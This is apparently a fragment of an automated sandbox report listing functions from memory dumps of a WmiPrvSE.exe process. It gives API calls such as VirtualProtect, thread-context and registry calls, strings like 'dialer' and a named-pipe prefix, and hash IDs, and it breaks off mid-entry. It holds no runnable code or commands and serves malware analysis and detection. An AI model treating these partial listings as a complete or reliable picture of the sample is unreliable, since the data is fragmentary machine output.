                                                                    control_flow_graph 739 2246446104c-224644610b9 RegQueryInfoKeyW 740 224644611b5-224644611d0 739->740 741 224644610bf-224644610c9 739->741 741->740 742 224644610cf-2246446111f RegEnumValueW 741->742 743 224644611a5-224644611af 742->743 744 22464461125-2246446112a 742->744 743->740 743->742 744->743 745 2246446112c-22464461135 744->745 746 22464461147-2246446114c 745->746 747 22464461137 745->747 749 22464461199-224644611a3 746->749 750 2246446114e-22464461193 GetProcessHeap call 22464476168 GetProcessHeap HeapFree 746->750 748 2246446113b-2246446113f 747->748 748->743 751 22464461141-22464461145 748->751 749->743 750->749 751->746 751->748
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                    • String ID: d
                                                                    • API String ID: 3743429067-2564639436
                                                                    • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction ID: 97e51a0e1799c231f318d2c68d7541239b68936e6eefef46b48f1f8a085199ea
                                                                    • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction Fuzzy Hash: FC417F33214B84D6EBA0DF61E4497AE7BA5F389B99F448129DA8907B5CDF38C449CF00
                                                                    Function 000002246446D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FlsGetValue.KERNEL32(?,?,?,000002246446C7DE,?,?,?,?,?,?,?,?,000002246446CF9D,?,?,00000001), ref: 000002246446D087
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002246446C7DE,?,?,?,?,?,?,?,?,000002246446CF9D,?,?,00000001), ref: 000002246446D0A6
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002246446C7DE,?,?,?,?,?,?,?,?,000002246446CF9D,?,?,00000001), ref: 000002246446D0CE
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002246446C7DE,?,?,?,?,?,?,?,?,000002246446CF9D,?,?,00000001), ref: 000002246446D0DF
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002246446C7DE,?,?,?,?,?,?,?,?,000002246446CF9D,?,?,00000001), ref: 000002246446D0F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID: 1%$Y%
                                                                    • API String ID: 3702945584-1395475152
                                                                    • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction ID: 2b67020f018a9f8810d59156f319f69f5f99629193290177f0e13786c2057087
                                                                    • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction Fuzzy Hash: E71163A070534461FEF877A5695F379614E6B5B7F4FB44325983A06EDEDE68C4028E00
                                                                    Function 0000022464467510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID:
                                                                    • API String ID: 190073905-0
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: 02971b820b1f720edead6e94786eebce5417bde31f7eca3576a75b4935d6c81a
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: 9881C5207186416AFFF0BBE5944B3B9669DA7877D0FD44525D90847F9EDB38C8468F00
                                                                    Function 0000022464469DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                    • String ID: api-ms-
                                                                    • API String ID: 2559590344-2084034818
                                                                    • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction ID: 1057103f6f7b7bacb58be7fb4e86cbf78fdae9517db24c23aa34a7a1ca2130f2
                                                                    • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction Fuzzy Hash: 4B319221312640F1FFB1EB86E40A776239CB74ABA4F990525DD2E47B98DF7AC4458B00
                                                                    Function 0000022464473DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                    • String ID: CONOUT$
                                                                    • API String ID: 3230265001-3130406586
                                                                    • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction ID: 9977123c592a0a2558a2b1c2e94fc5be4d7bf0382b4a74cdcb08c6f29ea8befd
                                                                    • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction Fuzzy Hash: 35118631310B4096EB60AB92E84932977A8F789FF5F844215EA5D87F9CCF38C415C740
                                                                    Function 0000022464463790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                    • String ID: wr
                                                                    • API String ID: 1092925422-2678910430
                                                                    • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction ID: beba4bd5143a7005743aa4a6b67fadfbb7bb6e270dc806b6ea42e0bf16e328ff
                                                                    • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction Fuzzy Hash: F5117C26700B8092FF64ABA1E40936963A9F74AB95F840428DE8903F58EF3DC505CB04
                                                                    Function 0000022464465B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$Current$Context
                                                                    • String ID:
                                                                    • API String ID: 1666949209-0
                                                                    • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                    • Instruction ID: 2490aa9edd2d35dc1b35cf80b65044f035778a8ad7bce42f117590e8af2ec3ea
                                                                    • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                    • Instruction Fuzzy Hash: 40D19A76208B8895DF70AB46E49936A7BA4F389B94F504216EACD47FA9DF3CC541CF00
                                                                    Function 0000022464462F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID: dialer
                                                                    • API String ID: 756756679-3528709123
                                                                    • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction ID: d284d968d2fd8232325140d9dc5d806b16967bb5c901ee55a9de54a3b180b692
                                                                    • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction Fuzzy Hash: 4331D322301B51A2EFB4FF96E54A77967A9FB46B84F888024DE4847F5DEF34C4658B00
                                                                    Function 00000224644614A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 70memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free
                                                                    • String ID: C:\Windows\system32\wbem\wmiprvse.exe
                                                                    • API String ID: 3168794593-1259001766
                                                                    • Opcode ID: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                    • Instruction ID: e9f7dae1fab4b7b5255c6d765aaba752519f6a0bb75ed83f8a29e95d0e04611c
                                                                    • Opcode Fuzzy Hash: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                    • Instruction Fuzzy Hash: 01210967508AC0AAEA70EFA59C5F26C37AAF747BE5F895015DF4943B4BDF2484068700
                                                                    Function 000002246446CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2506987500-0
                                                                    • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction ID: 953fb656c1a5e7654f19902a68dd3d8d9d0f57ddcaac15db275c38b9c8d208f5
                                                                    • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction Fuzzy Hash: 36115760305340A1FEB8B7F5665F339624A6B9B7F4FA44715D87647FDEDE68C4028A00
                                                                    Function 000002246446199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                    • String ID:
                                                                    • API String ID: 517849248-0
                                                                    • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction ID: adc9a817d258881fd196d69178090ff1622023928cb7a8209e4b631cbdfc50f7
                                                                    • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction Fuzzy Hash: 25018C31300A8092EF60EB92B84D76967AAF789FD1F884035DE4943B59DF3CC98AC740
                                                                    Function 00000224644636C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                    • String ID:
                                                                    • API String ID: 449555515-0
                                                                    • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction ID: 20dfc97ff248f3739827035c9928784f0eadb1a3e9421905e56d591f815e0822
                                                                    • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction Fuzzy Hash: 82012D6531178096FF74BBA2E80E37567A9BB56BA6F844428CD4907F58EF3DC5098B00
                                                                    Function 0000022464469005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 2395640692-629598281
                                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction ID: d2c190010534908993f02625561021bf305de032bda121dbcda214e7a0667142
                                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction Fuzzy Hash: 2951A332701600E6EFA4EB55E44DBB9379EF346B99FA48524DA0647B8CDBB6C841CF00
                                                                    Function 0000022464468FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 2395640692-629598281
                                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction ID: 403bbb061c88159d8dbeda6a0340d3399d244e6990b33f5adebd6e603dce4312
                                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction Fuzzy Hash: 94319E32300640E6EFA4EF51E84E7693BADF342B98F958414EE5607B8DDB7AC941CB04
                                                                    Function 0000022464461A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: FinalHandleNamePathlstrlen
                                                                    • String ID: \\?\
                                                                    • API String ID: 2719912262-4282027825
                                                                    • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction ID: b43a14c131ac2fc6fcd4ddf2d1e009e82513b7f79058703f217057bdacabd73f
                                                                    • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction Fuzzy Hash: 81F0AF22300640A2EF70AFA0FA897696769F749B98FC45021CA4946D5CDF3CC68ECB00
                                                                    Function 000002246446BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction ID: 3c386243357e00dbef162a6231f3403eec47c77efed3a0e8b81b1e06ba9f80a5
                                                                    • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction Fuzzy Hash: 5DF06261311B45A1EF30BFA4E44E3796369EB86B71FD41219DA6A459ECCF2CC146C700
                                                                    Function 0000022464463044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CombinePath
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3422762182-91387939
                                                                    • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction ID: 219d9db00b65c781e5955a1877dd2774fcf4abd58d1e4472959dfe5fb5cbb67c
                                                                    • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction Fuzzy Hash: 62F08260314B80A2EE64AB93B90D139676AAB4AFD0F846030EE4607F1CDF3CC44BC700
                                                                    Function 00000224644650D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                    • Instruction ID: 3f388cc176ee42d3324fc146a927625b36c4e92b72381d41904f326ac6c66b9c
                                                                    • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                    • Instruction Fuzzy Hash: 5602D832219B8496EBA0DB95F49936AB7A4F3C5794F500116EA8E87BADDF7CC444CF00
                                                                    Function 0000022464465710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                    • Instruction ID: ba3dfe25c340fd3b7bfdcdaa06f4cbf9f3dc059c1706f66e384b30fb40782212
                                                                    • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                    • Instruction Fuzzy Hash: 8F61FA36618B40D6EBB0AB95F48932A77A4F389794F900216EA8D47FADDB7CC450CF00
                                                                    Function 0000022464443504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366797216.0000022464430000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022464430000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464430000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: 30a2fff991300143e01505537aaf101f5d5793d333cd5b145f696a73dea32970
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: C1113323B54F5231FE7835E8E45F3791189EB5BBBCFD88A28A97606EDECA34C8514100
                                                                    Function 0000022464474104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: 44857d3d939d5db6289e3c9830a7dcdfa0cccb772fd628584e637a162f0a1988
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: A2115126A10E6531FE7535E9D45F375114DEB6B3F9FD90624E97606EDE8B28C8434200
                                                                    Function 0000022464469650 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1452528299-0
                                                                    • Opcode ID: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                    • Instruction ID: 7c8612e01c24415eb1c863d2fe99913f937ce5cc85331b76fa3f32e9de067aa4
                                                                    • Opcode Fuzzy Hash: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                    • Instruction Fuzzy Hash: 8B119320301391F2FFB4BBA5984E378269E6B477E0F984624D92607FDEDE69C801CB00
                                                                    Function 000002246443F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366797216.0000022464430000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022464430000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464430000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                    • API String ID: 3215553584-4202648911
                                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction ID: 7c44c2b3e09a4dfea30cf43eb7f97bb81abfb8e673111949709b4d6a33b8f505
                                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction Fuzzy Hash: 9A61A236502640A2FE7BFBEAE54F33A66AAE743F45FD04415DA0A17FADDA34CC418600
                                                                    Function 000002246446AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CallEncodePointerTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3544855599-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 14ce98710c487a19aa707a7e49f3e87516ba91466e207d7409f9994adf290151
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: 5861AD73700B84DAEB60EFA5D4453AD77A8F746B88F444216EF4A23B98DB78C495CB00
                                                                    Function 000002246443A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366797216.0000022464430000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022464430000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464430000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: 8253c1af8ae38c11a396d1e75753649282e4437fa8640d4729849655104b9feb
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 6251B032240280DAEF75AF97944A37877A8FB56F94F984215DA9997FC9CB38C450CB01
                                                                    Function 000002246446AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: 39c2cc989ace955bcb319b9185e1004572a062623c5feb59cd67706f28871d3f
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 8051A072300B90DAEFB4AF91D08936877A9FB57B84F94411ADA4957F99CB78C450CF01
                                                                    Function 0000022464438405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
